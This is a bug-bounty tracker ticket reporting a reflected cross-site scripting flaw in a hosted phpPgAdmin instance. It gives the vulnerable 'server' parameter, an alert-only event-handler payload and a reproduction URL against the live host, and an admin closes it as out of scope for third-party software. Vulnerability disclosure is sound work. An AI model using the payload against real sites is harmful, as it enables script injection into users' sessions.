Security vulnerabilities

  • Status Closed
  • Assigned To
    cbay
  • Private
Attached to Project: Security vulnerabilities
Opened by testing25 - 10.01.2026
Last edited by cbay - 12.01.2026

FS#284 - Cross site scripting ( XSS )

Vulnerable URL : https://phppgadmin.alwaysdata.com/phppgadmin/index.php?server=

Parameter : server=

Payload : "autofocus onfocus=alert(document.domain) ======================
Reproduce… Visit this URL you get an XSS pop-up : https://phppgadmin.alwaysdata.com/phppgadmin/index.php?server=%22autofocus%20onfocus=alert(document.domain)%20

Closed by  cbay
12.01.2026 08:54
Reason for closing:  Invalid
Admin
cbay commented on 12.01.2026 08:54

Hello,

This is an issue in phpPgAdmin, you should report it to them. Unfixed vulnerabilities from third party applications are excluded from our bug bounty program.

Kind regards,
Cyril

Loading...

Available keyboard shortcuts

Tasklist

Task Details

Task Editing